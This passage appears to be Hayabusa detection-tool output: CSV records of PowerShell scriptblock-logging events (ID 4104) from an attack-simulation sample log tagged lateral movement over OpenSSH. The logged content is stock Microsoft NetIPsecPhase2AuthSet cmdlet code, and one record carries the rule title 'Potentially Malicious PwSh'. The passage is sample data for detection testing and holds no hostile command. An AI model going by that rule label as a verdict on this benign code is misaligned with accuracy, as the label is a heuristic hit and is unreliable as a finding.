[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and 
(@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' -Alias '*' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 
+2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,") -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' -Alias '*' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { 
[object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 
'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' -Alias '*' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
